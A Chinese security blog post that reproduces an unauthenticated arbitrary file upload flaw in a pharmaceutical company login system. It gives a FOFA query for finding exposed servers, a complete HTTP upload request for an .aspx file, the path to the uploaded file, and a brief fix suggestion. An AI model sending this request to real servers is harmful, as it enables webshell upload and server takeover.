医药公司登录系统任意文件上传漏洞

已于 2024-08-17 15:40:50 修改
阅读量1k 收藏 22
点赞数 13
文章标签: web安全
于 2024-06-21 21:00:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77012231/article/details/139869725
版权

一、漏洞简介

医药公司登录系统是一个全面且高效的管理工具,涵盖了销售管理、客户档案管理、药品字典管理等多个核心模块。该系统支持前台零售、批发销售、销售审核等多种销售方式,并具备完善的客户档案管理功能,包括客户的基本信息、经营权限等。此外,系统还提供国药标准药品字典库云下载功能,便于用户快速获取药品信息。整体而言,医药公司登录系统通过自动化的管理和数据分析,帮助医药企业优化业务流程,提升市场竞争力。

二、影响版本

  • 医药公司登录系统、

三、资产测绘

  • fofabody="ResourceScripts/zh-cn-Login.aspx.js"

四、漏洞复现

数据包如下:

POST /upload/upload.aspx HTTP/1.1
Host: 
Content-Length: 480
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarylIECtsiNf8lUtAl1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://127.0.0.1/upload/upload.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: ASP.NET_SessionId=bkrz52xfqlkoolfx4xzjlawm; pix=1920_1080; CheckCode=9979
Connection: close

------WebKitFormBoundarylIECtsiNf8lUtAl1
Content-Disposition: form-data; name="__VIEWSTATE"

/wEPDwULLTE2NTg4MDUzMzhkZNQJYfJKK2zeijhvVyeGKCc5NQMdmluFbd+QNkTXqJv5
------WebKitFormBoundarylIECtsiNf8lUtAl1
Content-Disposition: form-data; name="__VIEWSTATEGENERATOR"

0E0DB7BE
------WebKitFormBoundarylIECtsiNf8lUtAl1
Content-Disposition: form-data; name="file1"; filename="md.aspx"
Content-Type: application/octet-stream

123
------WebKitFormBoundarylIECtsiNf8lUtAl1--


Web访问:http://X.X.X.X/UploadFiles/返回的路径.aspx

备用方案:

访问:http://X.X.X.X/upload/

点击

最后访问ip+/uploadfiles/路径即可查看到刚上传的文件

漏洞利用

修复建议

关闭互联网暴露面访问的权限,文件上传模块做好权限强认证

摸金校尉-马
关注
东华医疗协同办公系统 文件上传漏洞复现
0xSec
12-29 1637
东华医疗协同办公系统 connector接口处存在任意文件上传漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
东华医疗协同办公系统 templateFile 任意文件读取漏洞复现
0xSec
08-15 518
东华医疗协同办公系统 templateFile 存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
漏洞复现东华医疗协同办公系统文件上传漏洞
weixin_45530380的博客
01-02 1730
【代码】【漏洞复现东华医疗协同办公系统文件上传漏洞
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 954
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
北京神州分诊叫号系统 doctor 任意文件上传漏洞
iSee857的博客
10-31 283
首先确保系统限制了文件所必须的上传后缀,然后确保文件名不包含任何可能被解释为目录或遍历序列 ( ../) 的子字符串,同时做到重命名上传的文件以避免可能导致现有文件被覆盖的冲突并且上传文件的存储目录禁用执行权限。北京神州分诊叫号系统在/doctor接口处存在任意文件上传,攻击者可通过该漏洞在上传任意文件至服务器上从而实现远程接管。‌是一个集成了多种功能的综合管理系统,旨在提升医疗机构的分诊和叫号效率,优化患者就医体验。Fofa:title="分诊叫号后台"
1day 医药信息管理系统GetLshByTj存在SQL注入漏洞
weixin_43167326的博客
06-21 999
医药信息管理系统是一个全面且高效的管理工具,涵盖了销售管理、客户档案管理、药品字典管理等多个核心模块。医药信息管理系统GetLshByTj存在SQL注入漏洞
漏洞复现」英飞达医学影像存档与通信系统 Upload.asmx 任意文件上传漏洞
qq_39894062的博客
06-16 914
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
IP-guard flexpaper远程命令执行漏洞复现 [附POC]
薛定谔嘚喵博客
11-14 708
IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。该产品存在远程命令执行漏洞。攻击者可利用该漏洞执行任意命令直接获取服务器权限。
系统集成项目管理工程师笔记
热门推荐
gly1653810310的博客
10-26 2万+
目录依据第二版教程
IP-guard flexpaper远程命令执行漏洞
2303_76600842的博客
10-11 358
远程代码执行的漏洞复现详细过程。
【能源管理]安科瑞工厂能源管理系统在某水泥企业中的应用分析
Acrellyj的博客
11-23 824
由于传统系统未能考虑水泥企业的能耗标准及绩效指标问题,导致水泥企业资源利用率降低、能量消耗大。为此,本研究结合物联网技术设计了新的水泥企业能耗对标系统。首先设计水泥企业能耗对标体系框架,将水泥生产过程中的主要能耗指标设定为系统的KPI指标,分别计算不同的指标,并制定对应的能耗标准。在此基础上,根据水泥企业能耗标准分析用户需求以及非功能性需求,并结合物联网技术设系统的整体架构图及模块流程图,明确系统需要实现的功能。仿真实验结果表明:该系统能够有效提升水泥企业的资源利用率,减少生产过程的能量消耗。
智慧能源管控系统在钢铁企业的设计与应用
Acrel-TWR的博客
10-25 1914
摘要:在新时代发展背景下,钢铁行业依然存在结构产品单一与产能过剩等问题,对其生产所提出的环保要求也变得越来越严格,大部分企业都将降本增效当做核心任务。而通过构建能源管控系统是实现节能减排工作的有效措施。在钢铁企业智慧能源管控中心构建过程中,主要依靠的是大数据技术优势,将迅捷的计算方法和廉价传感器作为基础,为钢铁企业经营生产提供支持,形成了多元化的能源供给方式。对此本文针对钢铁企业智慧能源管控系统的基本架构与技术方案进行分析,并提出科学合理的开发与实践策略。关键词:钢铁企业;智慧能源管控系统;专家系统;技术方
中兴面试总结,华为。技术,市场
peng10101010的专栏
10-11 6234
1,软件测试,如何把这个测试做的更好。 2,
网络安全之SQL初步注入
blue_2021010615的博客
11-10 560
{"username":"hahah","password":123456,"time":"6546536435536"}类似于这种就是json串,常见于前后端分离项目,用于不同语言进行调用数据。查询1的时候,会展示username=1的用户数据,可以测试是否有注入点(闭合单引号并构造永真条件。用户输入的数据会被替换到SQL语句中的$name位置。此时应该想到XX型,去闭合括号尝试。利用burpsuilte抓包。闭合引号的同时还需要闭合括号。平台使用pikachu。此处有注入点,为XX型。
网络安全从零开始学习CTF——CTF基本概念
Hacker_Oldv的博客
11-09 1683
不要太深入,差不多就可以了,对照文档就可以写出程序就差不多了且能看得懂就好了,因为每个语言都是学不完的,一直在更新,如果过分专注于一个语言,安全知识就挺容易漏下的。上面都是个人想法,怎么选都要靠自己决定,要不要深入、深入哪一门都是问题,一定要考虑清楚再下手,别等下学了一半就改变方向,这是学习的大忌,因为你学其它的也会这样,除非是你发现这个不是很适合你的发展。其中,一血、二血、三血拿的分数比较高,后面答该题的队伍拿的分数就一样了,答题的队伍越少,分数就越多,然后按分数排名,确定进入决赛的队伍。
【网络安全 | 漏洞挖掘】隐藏的 DOS 技术
等风来
11-11 364
我调查了这些参数的用途,发现它们被传递给了第三方服务,且该服务的文档说明这些参数是安全的。你可以试试这样做:前往https://ash-speed.hetzner.com/并找到一个测试文件(大小大约1到10 GB),如果服务器等待URL请求完成,你可以通过大量此类请求来淹没服务器,从而导致它最终崩溃。于是我发送了一个包含1000个UUID的列表,结果网站在60秒后超时,并出现了显著的延迟。在我的案例中,这导致了客户网站的DOS攻击,问题被发现并快速修复,甚至在我报告漏洞之前。
【网络安全】OSI网络安全体系结构
最新发布
Hacker_Fuchen的博客
11-13 584
OSI安全体系结构是在开放式系统互联(OSI)参考模型的基础上,为了解决网络通信中的安全问题而提出的。随着计算机网络技术的快速发展,数据传输的安全性变得越来越重要。OSI安全体系结构的提出,旨在为网络通信提供一个标准化的安全框架,确保信息在传输过程中的机密性、完整性和可用性。国际标准化组织(ISO)在20世纪80年代提出了OSI参考模型,随后为了应对日益增长的网络安全需求,进一步发展了OSI安全体系结构。
2024年网络安全(黑客技术)三个月自学手册
csbDD的博客
11-12 587
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全(黑客)——自学2024
2401_85026883的博客
11-11 1025
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值